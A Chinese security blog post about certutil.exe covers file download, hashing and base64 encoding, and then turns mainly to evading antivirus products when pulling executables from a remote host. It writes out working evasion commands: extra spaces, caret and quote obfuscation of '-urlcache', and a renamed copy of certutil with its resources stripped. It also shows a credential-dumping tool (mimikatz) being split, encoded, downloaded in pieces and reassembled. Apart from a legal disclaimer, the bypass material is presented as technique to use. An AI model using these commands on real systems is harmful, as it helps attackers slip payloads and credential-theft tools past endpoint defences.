乌鸦安全的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。

乌鸦安全拥有对此文章的修改、删除和解释权限,如转载或传播此文章,需保证文章的完整性,未经允许,禁止转载!

本文所提供的工具仅用于学习,禁止用于其他,请在24小时内删除工具文件!!!

更新时间:2022.06.08

本文首发乌鸦安全知识星球

本文中部分方法随着时间推移已失效

1. certutil介绍

certutil.exe 是一个合法Windows文件,用于管理Windows证书的程序。

官方的解释是: certutil.exe是一个命令行程序,作为证书服务的一部分安装。您可以使用Certutil.exe转储和显示证书颁发机构(CA)配置信息,配置证书服务,备份和还原CA组件以及验证证书,密钥对和证书链。

以上参考至:https://docs.microsoft.com/zh-cn/windows-server/administration/windows-commands/certutil

复制

certutilwindows下一款下载文件的工具,自从WindowsServer2003就自带,但是在Server 2003使用会有问题,也就是说,以下命令是在Win7及其以后的机器中使用。其功能可校验文件MD5SHA1SHA256,下载恶意文件和免杀。

以上参考至:[https://blog.csdn.net/bring_coco/article/details/117352716] (https://blog.csdn.net/bring_coco/article/details/117352716)

复制

网上关于certutilbypass文章很多,但是我发现360很鸡贼,更新贼快,本文用其他的思路免杀看看。

2. 使用介绍

certutil -?的指令显示,当前可以做的东西非常的多:

2.1 文件下载

这个命令几乎是certutil使用最多的场景之一,在后面还会详细的介绍,首先在本地搭建一个http的服务:

此时的下载命令就是:

certutil.exe -urlcache -split -f http://192.168.22.104/crow.txt  

-f

覆盖现有文件。

有值的命令行选项。后面跟要下载的文件 url。

-split

保存到文件。

无值的命令行选项。加了的话就可以下载到当前路径,不加就下载到了默认路径。

-urlcache

显示或删除URL缓存条目。

无值的命令行选项。

(certutil.exe 下载有个弊端,它的每一次下载都有留有缓存。)

参考至:https://xz.aliyun.com/t/9737

复制

使用certutil下载文件会产生缓存,用如下命令查看: certutil -urlcache *

使用命令将当前的缓存删除:

certutil -urlcache * delete

复制

此时缓存已经删除 如果想以后下载文件不想要缓存的话,可以在下载文件结尾加上一个delete

certutil.exe -urlcache -split -f http://192.168.22.104/crow.txt delete

复制

2.2 hash验证

linux下可以使用md5md5sum等校验hash

Windows上就可以使用certutil来计算:

certutil -hashfile crow.txt MD5 //检验MD5

certutil -hashfile crow.txt SHA1 //检验SHA1

certutil -hashfile crow.txt  SHA256 //检验SHA256

复制

2.3 base64加解密

在这篇文章里面作者使用certutil对大文件进行了编码传输,并在文件传输之后,将文件进行了还原。

他主要使用的就是使用certutilencodedecode进行加解密。具体文章地址:https://xz.aliyun.com/t/9737

在这里我以自己以前做的免杀mimikatz复现一下。

首先将该文件使用certutil进行编码:

certutil -encode crowsec_bypass_mimikatz.exe m.txt

复制

将文件使用notepad打开,当前文件一共9w多行:

按照作者的方法,我将文件分为3个:

使用ctrl + g进行快速定位:

当前分割之后的文件分别为1.txt 2.txt 3.txt

然后再使用命令将当前的文件下载过来:

certutil.exe -urlcache -split -f http://192.168.22.104/1.txt

certutil.exe -urlcache -split -f http://192.168.22.104/2.txt

certutil.exe -urlcache -split -f http://192.168.22.104/3.txt

复制

将3个文件合并到一个文件中去:

copy *.txt mimikatz.txt   //把当前目录下的所有txt合并为mimikatz.txt

复制

然后对文件进行编码:

certutil -decode mimikatz.txt m.exe

复制

此时文件的hash值和原来的hash值相同:

3. Bypass

在我执行命令的过程中,发现了好多次被各种av拦截,所以在这里学习下如何bypass 在下面这个链接中

 https://view.inews.qq.com/a/20220530A04RST00

复制

作者对于各种场景进行了bypass和分析,但是在这里发现其中有些方法已经失效了,某某某杀软更新频繁,基本上对着更新,速度很快,那再试试其他的方法吧。

3.1 火绒(已失效)

环境:windows7 + 最新版火绒 直接执行命令:

certutil -urlcache  -split -f http://192.168.22.102/1.txt

certutil -urlcache  -split -f http://192.168.22.102/2.txt

certutil -urlcache  -split -f http://192.168.22.102/3.txt

复制

文件都下载下来了,火绒没有对此进行拦截,那如果下载一个exe呢?在这里下载一个cmd.exe试试:

certutil -urlcache  -split -f http://192.168.22.102/cmd.exe

复制

我的火绒没有对此进行任何的拦截操作。。。。

后来才发现,原来是我的空格问题,我在-spilt之前多空了一格:

空格两个,bypass 火绒:certutil -urlcache  -split -f http://192.168.22.102/1.exe

正常的一个空格:certutil -urlcache -split -f http://192.168.22.102/1.exe

复制

多余空格

所以bypass的方法就很多了,最简单的就是多空一格:

certutil -urlcache -split  -f http://192.168.22.102/1.exe  -f参数空两格

复制

多余参数

不过可以在火绒中加上任意多余的参数:

certutil -urlcache -f -split -f http://192.168.22.102/1.exe

复制

混淆字符

certutil -u^r^l^cache  -split -f http://192.168.22.102/1.exe

复制

3.2 360

certutil -urlcache -split -f http://192.168.22.102/1.exe

复制

直接被拦截:

通过学习可知,混淆无法绕过360,所以将certutil文件拷贝到当前目录,然后执行命令:

where certutil

copy C:\Windows\System32\certutil.exe crow.exe

复制

再来执行命令试试:

crow -urlcache -split -f http://192.168.22.102/cmd.exe

复制

 

依旧被拦截!执行crow -urlcache也是一样的结果:这说明360已经更新了,而且速度很快:

经过多次操作之后发现,基本上混淆啥的都是没用的,在这里使用restorator 2018这个工具打开看下,它可以修改exe的属性和图标等:

打开之后可以看到这里有很醒目的版本信息:

所以在这里对版本、图标等全部删除:

将文件另存为crow3.exe

crow3.exe -urlcache -split -f http://192.168.22.102/cmd.exe

复制

此时文件下载成功。

所以对于360来说(截止2022.06.09)

where certutil

copy C:\Windows\System32\certutil.exe crow.exe

将crow.exe 去特征,再执行命令

crow3 -urlcache -split -f http://192.168.22.102/cmd.exe

复制

3.3 windows Defender

当前环境为Windows10 ltsb 长期服务器版 启用windows Defender

直接执行的时候,直接杀

certutil -urlcache  -split -f http://192.168.22.102/cmd.exe

复制

简单变形之后,还是杀

certutil -u^r^l^c^a^c^he  -split -f http://192.168.22.102/cmd.exe

复制

使用刚刚过360的方法,一样被杀:

crow3 -urlcache -split -f http://192.168.22.102/cmd.exe

复制

下面这个命令不杀:

crow3 -urlcache

复制

 

继续:

crow3 -urlcache -split

复制

 
crow3 -urlcache -split -f

复制

 
crow3 -urlcache -split -f http:

复制

 

很明显了,这里就开始杀了,要混淆才行。

crow3  -url""cache -split -f   http://192.168.22.102/cmd.exe

复制

还是不行。 终于,使用"""bypass成功。

certutil  -url""""cache -split -f   http://192.168.22.102/cmd.exe

复制

使用这个也可以绕过:

经过测试发现,使用""""都可以绕过windows Defender

4. 总结

针对certitul的使用,对av来说,查杀不算严格,cmd命令混淆的目的就是为这类服务的,对于不同的环境有不同的方法来做,不要太追求bypass everyone

本文跨度时间周期较长,其中的某些方法已经无法过杀软,仅供参考。

certutil工具使用和bypass学习的更多相关文章

  1. 代码管理工具之git的学习

    1.代码管理工具git的学习  http://www.ruanyifeng.com/blog/2015/12/git-cheat-sheet.html 2.github的使用帮助   https:// ...

  2. java/.net-常用工具下载地址&常用学习网址&快捷键

    HTML5 HTML5:http://www.html5cn.org/ php常用网址 thinkphp框架:http://www.thinkphp.cn/ wampserver开发服务器:http: ...

  3. C#入门教程(一)–.Net平台技术介绍、C#语言及开发工具介绍-打造C#学习教程

    一.什么是.Net平台? .Net平台是微软搭建的技术平台,技术人员在此平台上进行应用的搭建与开发.它提供了运行所必须的环境.NET Framework类库以及CLR(公共语言运行时).好比我们人类的 ...

  4. http性能测试工具wrk源码学习之开篇

    1.前言 最近工作需要测试nginx反向代理的性能,于是找了一些http测试工具,例如经典的Apache的ab.siege.wrk.wrk使用多线程事件驱动方式,支持lua脚本扩展.关于wrk介绍可以 ...

  5. [工具向]__关于androidstudio工具使用过程中学习到的一些知识点简记

    前言 在我学习android开发课程的过程中,我们通常只会关注编程语言上面的一些知识点与问题,而忽略了开发工具的使用上的一些遇到的一些知识,其实每一款IDE工具都是集编程语言大成而开发出来的,其中有很 ...

  6. PYTHON 实现的微信跳一跳【辅助工具】仅作学习

    备注原地址:https://my.oschina.net/anlve/blog/1604163 我又做了一些优化,防止WX检测作弊 准备环境: Windows 10安卓手机,源码中有适配ios,然后链 ...

  7. 【开发工具 docker】值得学习的应用容器引擎docker安装

    概述: Docker 是一个开源的应用容器引擎,基于 Go 语言 并遵从 Apache2.0 协议开源. Docker 可以让开发者打包他们的应用以及依赖包到一个轻量级.可移植的容器中,然后发布到任何 ...

  8. 【工具篇】Selenium 学习实践(一)环境搭建

    一.环境搭建 (1)初学者最佳环境: Python 2.7 + Selenium 2+ Firefox 46 (2)喜欢尝新的环境: Python 3.6 + Selenium 3+ Firefox ...

  9. Ruby中任务构建工具rake的入门学习教程

    参考:http://www.jb51.net/article/81476.htm Rake简介 Rake的意思是Ruby Make,一个用ruby开发的代码构建工具. 但是,为什么Ruby需要Rake ...

  10. 【AirTest自学】AirTest工具介绍和入门学习(一)

    ==================================================================================================== ...

随机推荐

  1. 快速入门pandas进行数据挖掘数据分析[多维度排序、数据筛选、分组计算、透视表](一)

    1. 快速入门python,python基本语法 Python使用缩进(tab或者空格)来组织代码,而不是像其 他语言比如R.C++.Java和Perl那样用大括号.考虑使用for循 环来实现排序算法 ...

  2. RabbitMQ消息队列入门及解决常见问题

    RabbitMQ消息队列 同步通讯和异步通讯 微服务间通讯有同步和异步两种方式: 同步通讯:就像打电话,需要实时响应. 异步通讯:就像发邮件,不需要马上回复. 两种方式各有优劣,打电话可以立即得到响应 ...

  3. 浅谈Pytest中的warning处理

    浅谈Pytest中的warning处理 没有处理warning 我们写一个简单的测试 import pytest def test_demo(): import warnings warnings.w ...

  4. 淘宝数据采集之js采集

    搜索页面采集,数据在控制台哦!!! 搜索页面采集,数据在控制台哦!!! 搜索页面采集,数据在控制台哦!!! 既然能打到控制台,当然也能传到系统!!! 既然能打到控制台,当然也能传到系统!!! 既然能打 ...

  5. bind使用场景之一

  6. Spring02---IOC-Debug查看Bean的实例化过程

    1 简介 springIOC它是对bean进行管理. 我们通常可以通过xml.properties.yml.注解等来配置bean的信息 spring读取这些配置信息,解析,生成BeanDefiniti ...

  7. webrtc QOS笔记一 Neteq直方图算法浅读

    webrtc QOS笔记一 Neteq直方图算法浅读 目录 webrtc QOS笔记一 Neteq直方图算法浅读 Histogram Algorithm 获取目标延迟 遗忘因子曲线 想起博客园帐号了, ...

  8. 嵌入式Linux—FreeType矢量字体

    freetype矢量字体 常用API 1.FT_Init_FreeType函数是FreeType库中的一个函数,其作用是初始化FreeType库,并返回一个指向FT_Library对象的指针.下面是该 ...

  9. ubuntu 一键安装lnmp环境

    转载csdn: ubuntu 一键安装lnmp环境_手艺人小在的博客-CSDN博客 注意:采用编译安装方法,花费时间较长,这个只有稳定版的,没有高版本的. 转载vpsgo: Linux上一键安装LNM ...

  10. vue-cli 更新遇到的问题,卸载不掉旧版本2.9.6(可行)

    今天更新vue-cli时,遇到问题:卸载不掉旧版本2.9 官网给的信息是:Vue CLI 的包名称由 vue-cli 改成了 @vue/cli. 如果你已经全局安装了旧版本的 vue-cli (1.x ...